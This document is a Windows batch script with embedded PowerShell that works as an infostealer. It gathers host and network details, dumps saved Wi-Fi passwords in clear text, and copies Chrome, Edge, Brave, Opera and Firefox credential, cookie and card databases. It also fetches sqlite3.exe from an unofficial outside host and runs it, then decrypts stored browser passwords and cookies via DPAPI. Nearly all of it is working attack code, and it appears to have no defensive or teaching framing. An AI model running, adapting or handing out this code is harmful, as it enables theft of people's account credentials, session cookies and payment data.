@echo off setlocal enabledelayedexpansion :: ============================================ :: MASTER SCRIPT - Modular Chain Execution (Final) :: ============================================ :: --- Configuration --- :: Set to "yes" to keep the temp directory after the script finishes set "keepFiles=yes" :: --- Initialization --- :: Generate a single random identifier for the entire session set "randPart=%random%%random%" set "tempDir=%temp%\sys_%randPart%" :: Create temp directory once if not exist "%tempDir%" mkdir "%tempDir%" 2>nul echo. echo ======================================== echo MODULAR SCRIPT EXECUTION echo ======================================== echo Session ID: %randPart% echo Temp Directory: %tempDir% echo ======================================== echo. :: Execute Module 1 call :Module1 if %errorlevel% neq 0 ( echo [-] Module 1 failed goto :EndWithCleanup ) :: Execute Module 2 call :Module2 if %errorlevel% neq 0 ( echo [-] Module 2 failed goto :EndWithCleanup ) :: Execute Module 2B call :Module2B if %errorlevel% neq 0 ( echo [-] Module 2B failed goto :EndWithCleanup ) :: Execute Module 3 call :Module3 if %errorlevel% neq 0 ( echo [-] Module 3 failed goto :EndWithCleanup ) :: Execute Module 3B call :Module3B if %errorlevel% neq 0 ( echo [-] Module 3B failed goto :EndWithCleanup ) :: Execute Module 3C call :Module3C if %errorlevel% neq 0 ( echo [-] Module 3C failed goto :EndWithCleanup ) :: Success echo. echo ======================================== echo ALL MODULES COMPLETED SUCCESSFULLY echo ======================================== echo. goto :EndWithCleanup :: ============================================ :: MODULE 1: CORE SETUP & ADMIN CHECK :: ============================================ :Module1 echo. echo ======================================== echo MODULE 1: Core Setup and Admin Check echo ======================================== echo. echo [+] Random ID: %randPart% echo [+] Temp directory: %tempDir% if exist "%tempDir%" ( echo [+] Temp directory verified ) else ( echo [-] ERROR: Temp directory creation failed exit /b 1 ) :: Check for admin privileges using a more reliable method echo [*] Checking for administrator privileges... fsutil dirty query %systemdrive% >nul 2>&1 if %errorlevel% == 0 ( echo [+] SUCCESS: Running with administrator privileges set "isAdmin=true" ) else ( echo [-] WARNING: Not running as administrator. Some information may be incomplete. set "isAdmin=false" ) echo. echo [+] Module 1 completed successfully echo. exit /b 0 :: ============================================ :: MODULE 2: NETWORK INFORMATION GATHERING :: ============================================ :Module2 echo. echo ======================================== echo MODULE 2: Network Information echo ======================================== echo. set "netLog=%tempDir%\network_info.txt" :: Section 2.1: Basic Network Configuration echo [*] Collecting basic network configuration... call :WriteLogHeader "NETWORK CONFIGURATION" "%netLog%" ( echo Computer Name: %COMPUTERNAME% echo User Name: %USERNAME% echo User Domain: %USERDOMAIN% ) >> "%netLog%" :: Section 2.2: Network Adapter Information echo [*] Gathering adapter information... call :WriteLogHeader "NETWORK ADAPTERS" "%netLog%" ipconfig /all >> "%netLog%" 2>nul if %errorlevel% neq 0 ( echo [-] WARNING: 'ipconfig /all' command failed or returned no data. ) else ( echo [+] Network configuration saved ) :: Section 2.3: Active Connections echo [*] Checking active connections... call :WriteLogHeader "ACTIVE CONNECTIONS" "%netLog%" netstat -ano >> "%netLog%" 2>nul if %errorlevel% neq 0 ( echo [-] WARNING: 'netstat -ano' command failed or returned no data. ) else ( echo [+] Active connections saved ) :: Section 2.4: Routing Table echo [*] Gathering routing information... call :WriteLogHeader "ROUTING TABLE" "%netLog%" route print >> "%netLog%" 2>nul if %errorlevel% neq 0 ( echo [-] WARNING: 'route print' command failed or returned no data. ) else ( echo [+] Routing information saved ) :: Section 2.5: WAN IP Detection echo [*] Detecting WAN (public) IP address... call :WriteLogHeader "WAN IP ADDRESS" "%netLog%" :: Try curl first, with a fallback to a second service, then PowerShell, and finally an error message. curl -s ifconfig.me >> "%netLog%" 2>nul || curl -s icanhazip.com >> "%netLog%" 2>nul || powershell -Command "try { (Invoke-WebRequest -Uri 'http://ifconfig.me/ip' -UseBasicParsing).Content.Trim() } catch { 'Could not detect WAN IP via PowerShell' }" >> "%netLog%" 2>nul echo. >> "%netLog%" echo [+] WAN IP detection complete :: Verify file creation if exist "%netLog%" ( for %%A in ("%netLog%") do ( echo [+] Network log created: %%~zA bytes ) ) else ( echo [-] ERROR: Network log was not created. exit /b 1 ) echo. echo [+] Module 2 completed successfully echo [*] Log file: %netLog% echo. exit /b 0 :: ============================================ :: MODULE 2B: WI-FI CREDENTIAL EXTRACTION :: ============================================ :Module2B echo. echo ======================================== echo MODULE 2B: Wi-Fi Credentials echo ======================================== echo. :: Check for admin rights, which are required for this module if "%isAdmin%"=="false" ( echo [-] CRITICAL: Wi-Fi credential extraction requires administrator privileges. echo [-] Skipping Module 2B. exit /b 1 ) set "wifiLog=%tempDir%\wifi_credentials.txt" echo [*] Extracting saved Wi-Fi profiles and passwords... echo ===== WI-FI CREDENTIALS ===== > "%wifiLog%" echo. >> "%wifiLog%" echo Extraction Date: %date% %time% >> "%wifiLog%" echo Computer: %COMPUTERNAME% >> "%wifiLog%" echo. >> "%wifiLog%" :: Get all saved Wi-Fi profiles for /f "tokens=2 delims=:" %%a in ('netsh wlan show profiles ^| findstr /C:"All User Profile"') do ( set "profile=%%a" set "profile=!profile:~1!" echo. >> "%wifiLog%" echo ====================================== >> "%wifiLog%" echo Profile: !profile! >> "%wifiLog%" echo ====================================== >> "%wifiLog%" :: Extract password for each profile netsh wlan show profile name="!profile!" key=clear >> "%wifiLog%" 2>nul if !errorlevel! neq 0 ( echo [*] Could not retrieve details for profile: !profile! ) else ( echo [+] Extracted: !profile! ) ) :: Verify file creation if exist "%wifiLog%" ( for %%A in ("%wifiLog%") do ( echo [+] Wi-Fi credentials saved: %%~zA bytes ) ) else ( echo [-] ERROR: Wi-Fi credential log not created exit /b 1 ) echo. echo [+] Module 2B completed successfully echo [*] Log file: %wifiLog% echo. exit /b 0 :: ============================================ :: MODULE 3: DYNAMIC BROWSER DATA EXTRACTION :: ============================================ :Module3 echo. echo ======================================== echo MODULE 3: Browser Data Extraction echo ======================================== echo. set "browserDataDir=%tempDir%\browser_data" if not exist "%browserDataDir%" mkdir "%browserDataDir%" set "browserLog=%tempDir%\browser_extraction_log.txt" echo ===== BROWSER DATA EXTRACTION LOG ===== > "%browserLog%" echo Extraction Date: %date% %time% >> "%browserLog%" echo Computer: %COMPUTERNAME% >> "%browserLog%" echo. >> "%browserLog%" :: --- Section 3.1: Chromium Browser Discovery --- echo [*] Scanning for Chromium-based browsers... set "foundChromium=false" for /d %%B in ("%LOCALAPPDATA%\*") do ( if exist "%%B\User Data\Default\History" ( set "foundChromium=true" set "browserName=%%~nxB" if /I "!browserName!"=="BraveSoftware" set "browserName=Brave" if /I "!browserName!"=="Google" set "browserName=Chrome" if /I "!browserName!"=="Microsoft" set "browserName=Edge" if /I "!browserName!"=="OperaSoftware" set "browserName=Opera" if /I "!browserName!"=="Vivaldi" set "browserName=Vivaldi" echo [*] Processing browser: !browserName! echo [+] Found Chromium browser: !browserName! >> "%browserLog%" if exist "%%B\User Data\Default\History" ( copy "%%B\User Data\Default\History" "%browserDataDir%\!browserName!_History" >nul 2>&1 && echo [+] Copied History || echo [-] Failed to copy History ) if exist "%%B\User Data\Default\Cookies" ( copy "%%B\User Data\Default\Cookies" "%browserDataDir%\!browserName!_Cookies" >nul 2>&1 && echo [+] Copied Cookies || echo [-] Failed to copy Cookies ) if exist "%%B\User Data\Default\Bookmarks" ( copy "%%B\User Data\Default\Bookmarks" "%browserDataDir%\!browserName!_Bookmarks" >nul 2>&1 && echo [+] Copied Bookmarks || echo [-] Failed to copy Bookmarks ) if exist "%%B\User Data\Default\Login Data" ( copy "%%B\User Data\Default\Login Data" "%browserDataDir%\!browserName!_Login Data" >nul 2>&1 && echo [+] Copied Login Data || echo [-] Failed to copy Login Data ) if exist "%%B\User Data\Default\Web Data" ( copy "%%B\User Data\Default\Web Data" "%browserDataDir%\!browserName!_Web Data" >nul 2>&1 && echo [+] Copied Web Data || echo [-] Failed to copy Web Data ) if exist "%%B\User Data\Default\Local Storage" ( xcopy "%%B\User Data\Default\Local Storage" "%browserDataDir%\!browserName!_LocalStorage" /E /I /H /Y >nul 2>&1 && echo [+] Copied Local Storage || echo [-] Failed to copy Local Storage ) echo. >> "%browserLog%" ) ) if "%foundChromium%"=="false" ( echo [-] No Chromium browsers found. echo [-] No Chromium browsers found. >> "%browserLog%" ) :: --- Section 3.2: Firefox Profile Discovery --- echo. echo [*] Scanning for Firefox profiles... set "foundFirefox=false" set "firefoxBase=%APPDATA%\Mozilla\Firefox\Profiles" if exist "%firefoxBase%" ( for /d %%P in ("%firefoxBase%\*") do ( set "profileName=%%~nxP" echo !profileName! | findstr /i /C:"default" >nul && ( set "foundFirefox=true" echo [*] Processing Firefox profile: "%%P" echo [+] Found Firefox profile: !profileName! >> "%browserLog%" if exist "%%P\places.sqlite" ( copy "%%P\places.sqlite" "%browserDataDir%\Firefox_!profileName!_places.sqlite" >nul 2>&1 && echo [+] Copied places.sqlite || echo [-] Failed to copy places.sqlite ) if exist "%%P\key4.db" ( copy "%%P\key4.db" "%browserDataDir%\Firefox_!profileName!_key4.db" >nul 2>&1 && echo [+] Copied key4.db || echo [-] Failed to copy key4.db ) if exist "%%P\logins.json" ( copy "%%P\logins.json" "%browserDataDir%\Firefox_!profileName!_logins.json" >nul 2>&1 && echo [+] Copied logins.json || echo [-] Failed to copy logins.json ) echo. >> "%browserLog%" ) ) ) if "%foundFirefox%"=="false" ( echo [-] No default Firefox profiles found. echo [-] No default Firefox profiles found. >> "%browserLog%" ) :: --- Final Verification --- echo. echo ======================================== echo BROWSER EXTRACTION SUMMARY echo ======================================== if exist "%browserDataDir%\*" ( echo [+] Browser data files copied to: %browserDataDir% dir /b "%browserDataDir%" ) else ( echo [-] No browser data was copied. ) echo ======================================== echo. echo [+] Module 3 completed successfully echo [*] Log file: %browserLog% echo. exit /b 0 :: ============================================ :: MODULE 3B: PARSE BROWSER DATABASES (POWERSHELL-DRIVEN) :: ============================================ :Module3B echo. echo ======================================== echo MODULE 3B: Parsing Browser Databases echo ======================================== echo. set "browserDataDir=%tempDir%\browser_data" set "sqlitePath=%tempDir%\sqlite3.exe" if not exist "%browserDataDir%\*_History" ( echo [-] No browser history files found to parse. Skipping Module 3B. exit /b 0 ) :: Check if sqlite3.exe exists, if not, download it if not exist "%sqlitePath%" ( echo [*] sqlite3.exe not found. Attempting to download... echo [*] Downloading from https://dxtremes.com/sqlite3.exe... powershell -Command "Invoke-WebRequest -Uri 'https://dxtremes.com/sqlite3.exe' -OutFile '%tempDir%\sqlite3.exe'" if not exist "%sqlitePath%" ( echo [-] ERROR: Failed to download sqlite3.exe. Cannot parse databases. echo [*] Raw database files are available in: %browserDataDir% exit /b 1 ) else ( echo [+] sqlite3.exe downloaded successfully. ) ) else ( echo [+] sqlite3.exe already exists. ) :: --- Let PowerShell Handle All Parsing --- echo [*] Parsing browser data with PowerShell... set "ps1Script=%tempDir%\parse_browsers.ps1" :: Create a PowerShell script to do all the parsing work ( echo param^($BrowserDataDir, $SqlitePath^) echo. echo # Function to get a clean browser name from a file path echo function Get-BrowserName { echo param^([string^]$FilePath^) echo $name = (Get-Item $FilePath^).BaseName echo if ($name -match "_History"^) { return $name.Replace("_History", ""^) } echo if ($name -match "_Cookies"^) { return $name.Replace("_Cookies", ""^) } echo if ($name -match "_Login Data"^) { return $name.Replace("_Login Data", ""^) } echo if ($name -match "_Web Data"^) { return $name.Replace("_Web Data", ""^) } echo if ($name -match "_Bookmarks"^) { return $name.Replace("_Bookmarks", ""^) } echo return $name echo } echo. echo # --- Parse History --- echo Get-ChildItem -Path "$BrowserDataDir" -Filter "*_History" ^| ForEach-Object { echo if ($_.PSIsContainer^) { return } echo $browserName = Get-BrowserName -FilePath $_.FullName echo $outputFile = Join-Path $BrowserDataDir "$browserName`_history.csv" echo Write-Host "[+] Parsing history for $browserName..." echo $sql = "SELECT datetime(visits.visit_time/1000000-11644473600,'unixepoch','localtime') as VisitTime, urls.url, urls.title FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time DESC;" echo try { & $SqlitePath $sql $_.FullName ^| Out-File -FilePath $outputFile -Encoding UTF8 } catch { Write-Warning "Failed to parse history for $browserName" } echo } echo. echo # --- Parse Cookies --- echo Get-ChildItem -Path "$BrowserDataDir" -Filter "*_Cookies" ^| ForEach-Object { echo if ($_.PSIsContainer^) { return } echo $browserName = Get-BrowserName -FilePath $_.FullName echo $outputFile = Join-Path $BrowserDataDir "$browserName`_cookies.csv" echo Write-Host "[+] Parsing cookies for $browserName..." echo $sql = "SELECT datetime(creation_utc/1000000-11644473600,'unixepoch','localtime') as CreationTime, host_key, name, path, datetime(expires_utc/1000000-11644473600,'unixepoch','localtime') as ExpiryTime FROM cookies;" echo try { & $SqlitePath $sql $_.FullName ^| Out-File -FilePath $outputFile -Encoding UTF8 } catch { Write-Warning "Failed to parse cookies for $browserName" } echo } echo. echo # --- Parse Credit Cards --- echo Get-ChildItem -Path "$BrowserDataDir" -Filter "*_Web Data" ^| ForEach-Object { echo if ($_.PSIsContainer^) { return } echo $browserName = Get-BrowserName -FilePath $_.FullName echo $outputFile = Join-Path $BrowserDataDir "$browserName`_credit_cards.csv" echo Write-Host "[+] Parsing credit cards for $browserName..." echo $sql = "SELECT guid, name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards;" echo try { & $SqlitePath $sql $_.FullName ^| Out-File -FilePath $outputFile -Encoding UTF8 } catch { Write-Warning "Failed to parse credit cards for $browserName" } echo } echo. echo # --- Convert Bookmarks --- echo Get-ChildItem -Path "$BrowserDataDir" -Filter "*_Bookmarks" ^| ForEach-Object { echo if ($_.PSIsContainer^) { return } echo $browserName = Get-BrowserName -FilePath $_.FullName echo $outputFile = Join-Path $BrowserDataDir "$browserName`_Bookmarks.txt" echo Write-Host "[+] Converting bookmarks for $browserName..." echo "===== Bookmarks for $browserName" ^| Out-File -FilePath $outputFile -Encoding UTF8 echo try { echo $json = Get-Content $_.FullName -Raw ^| ConvertFrom-Json echo if ($?^) { $json ^| ConvertTo-Json -Depth 10 ^| Out-File -FilePath $outputFile -Append -Encoding UTF8 } echo else { echo Add-Content $outputFile 'Error: Could not parse JSON. Displaying raw content.' echo Get-Content $_.FullName ^| Out-File -FilePath $outputFile -Append -Encoding UTF8 echo } echo } catch { Write-Warning "Failed to convert bookmarks for $browserName" } echo } ) > "%ps1Script%" :: Execute the PowerShell script, passing paths as parameters powershell -ExecutionPolicy Bypass -File "%ps1Script%" -BrowserDataDir "%browserDataDir%" -SqlitePath "%sqlitePath%" echo. echo [+] Module 3B completed successfully echo [*] Parsed data saved in: %browserDataDir% echo. exit /b 0 :: ============================================ :: MODULE 3C: DPAPI DECRYPTION :: ============================================ :Module3C echo. echo ======================================== echo MODULE 3C: DPAPI Decryption echo ============================================ echo. set "browserDataDir=%tempDir%\browser_data" set "ps1Script=%tempDir%\decrypt.ps1" set "sqlitePath=%tempDir%\sqlite3.exe" if not exist "%sqlitePath%" ( echo [-] ERROR: sqlite3.exe not found. Cannot perform decryption. exit /b 1 ) :: Create a PowerShell script to handle decryption :: This avoids all command-line escaping issues ( echo param^( echo [string^]$inputFile, echo [string^]$outputFile, echo [string^]$type echo ^) echo. echo # Function to convert a hex string to a byte array echo function Convert-HexToByteArray { echo param^([string^]$hex^) echo [byte[]]($hex -split '([a-fA-F0-9]{2})' ^| Where-Object { $_ } ^| ForEach-Object { [byte]::Parse($_, 'HexNumber') }^) echo } echo. echo # Function to decrypt a DPAPI protected byte array echo function Unprotect-Bytes { echo param([byte[]]$encryptedBytes^) echo try { echo return [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser^) echo } catch { echo Write-Warning "Decryption failed: $_" echo return $null echo } echo } echo. echo $outputContent = "DecryptedValue" echo if ($type -eq "login"^) { $outputContent += "`tURL`tUsername" } echo if ($type -eq "cookie"^) { $outputContent += "`tCreationTime`tHostKey`tName`tPath`tExpiryTime" } echo $outputContent ^| Out-File -FilePath $outputFile -Encoding UTF8 echo. echo Get-Content $inputFile ^| ForEach-Object { echo $line = $_ echo $columns = $line -split "`t" echo. echo if ($type -eq "login"^) { echo $url = $columns[0] echo $user = $columns[1] echo $passHex = $columns[2] echo if ($passHex^) { echo $passBytes = Convert-HexToByteArray $passHex echo $decryptedPass = [System.Text.Encoding]::UTF8.GetString((Unprotect-Bytes $passBytes^)^) echo "$decryptedPass`t$url`t$user" ^| Out-File -FilePath $outputFile -Append -Encoding UTF8 echo } echo } echo. echo if ($type -eq "cookie"^) { echo $creationTime = $columns[0] echo $hostKey = $columns[1] echo $name = $columns[2] echo $path = $columns[3] echo $expiryTime = $columns[4] echo $valueHex = $columns[5] echo if ($valueHex^) { echo $valueBytes = Convert-HexToByteArray $valueHex echo $decryptedValue = [System.Text.Encoding]::UTF8.GetString((Unprotect-Bytes $valueBytes^)^) echo "$decryptedValue`t$creationTime`t$hostKey`t$name`t$path`t$expiryTime" ^| Out-File -FilePath $outputFile -Append -Encoding UTF8 echo } echo } echo } ) > "%ps1Script%" :: --- Decrypt Chromium Passwords --- echo [*] Attempting to decrypt Chromium passwords... for %%F in ("%browserDataDir%\*_Login Data") do ( if exist "%%F\" ( echo [-] Skipping directory: %%F ) else ( set "dbFile=%%F" set "browserName=%%~nF" set "browserName=!browserName:_Login Data=!" set "outputFile=%browserDataDir%\!browserName!_decrypted_passwords.csv" set "tempFile=%browserDataDir%\!browserName!_temp_pass.tsv" echo [+] Processing passwords for !browserName!... ( echo .headers off echo .mode tabs echo SELECT origin_url, username_value, hex(password_value) FROM logins WHERE blacklisted_by_user = 0; ) | "%sqlitePath%" "!dbFile!" > "!tempFile!" if exist "!tempFile!" ( powershell -ExecutionPolicy Bypass -File "%ps1Script%" -inputFile "!tempFile!" -outputFile "!outputFile!" -type "login" del "!tempFile!" >nul 2>&1 ) ) ) :: --- Decrypt Chromium Cookies --- echo. echo [*] Attempting to decrypt Chromium cookies... for %%F in ("%browserDataDir%\*_Cookies") do ( if exist "%%F\" ( echo [-] Skipping directory: %%F ) else ( set "dbFile=%%F" set "browserName=%%~nF" set "browserName=!browserName:_Cookies=!" set "outputFile=%browserDataDir%\!browserName!_decrypted_cookies.csv" set "tempFile=%browserDataDir%\!browserName!_temp_cookies.tsv" echo [+] Processing cookies for !browserName!... ( echo .headers off echo .mode tabs echo SELECT datetime(creation_utc/1000000-11644473600,'unixepoch','localtime'), host_key, name, path, datetime(expires_utc/1000000-11644473600,'unixepoch','localtime'), hex(encrypted_value) FROM cookies; ) | "%sqlitePath%" "!dbFile!" > "!tempFile!" if exist "!tempFile!" ( powershell -ExecutionPolicy Bypass -File "%ps1Script%" -inputFile "!tempFile!" -outputFile "!outputFile!" -type "cookie" del "!tempFile!" >nul 2>&1 ) ) ) echo. echo [+] Module 3C completed successfully echo [*] Decrypted data saved in: %browserDataDir% echo. exit /b 0 :: ============================================ :: HELPER FUNCTIONS :: ============================================ :WriteLogHeader :: Writes a formatted header to a specified log file :: %~1 = Title of the section :: %~2 = Path to the log file echo. >> "%~2" echo ===== %~1 ===== >> "%~2" echo. >> "%~2" exit /b 0 :: ============================================ :: END AND CLEANUP :: ============================================ :EndWithCleanup echo. echo ======================================== echo EXECUTION SUMMARY echo ======================================== echo Session ID: %randPart% echo Temp Directory: %tempDir% echo. if exist "%tempDir%" ( echo Files created: dir /b "%tempDir%" ) echo ======================================== :: --- Cleanup Logic --- if /I "%keepFiles%"=="yes" ( echo [*] Keeping temporary files as per configuration. ) else ( echo [*] Cleaning up temporary directory... if exist "%tempDir%" ( rmdir /s /q "%tempDir%" if !errorlevel! equ 0 ( echo [+] Successfully deleted %tempDir% ) else ( echo [-] Failed to delete %tempDir%. Please remove it manually. ) ) ) echo. pause exit /b 0